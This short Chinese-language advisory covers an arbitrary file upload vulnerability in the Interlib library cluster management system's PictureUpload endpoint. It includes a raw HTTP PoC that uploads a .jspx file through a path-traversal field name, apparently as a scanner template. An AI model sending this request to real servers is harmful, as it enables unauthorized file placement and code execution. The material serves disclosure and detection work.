漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
Interlib图书馆集群管理系统 PictureUpload 任意文件上传漏洞
PoC代码
POST /inerlib/loan/PictureUpload HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Accept-Encoding: gzip
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Connection: keep-alive
Content-Length: 160
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
User-Agent: MyUploadClient/1.0
------WebKitFormBoundary
Content-Disposition: form-data; name="/../123"; filename="1.jspx"
Content-Type: application/html
123
------WebKitFormBoundary--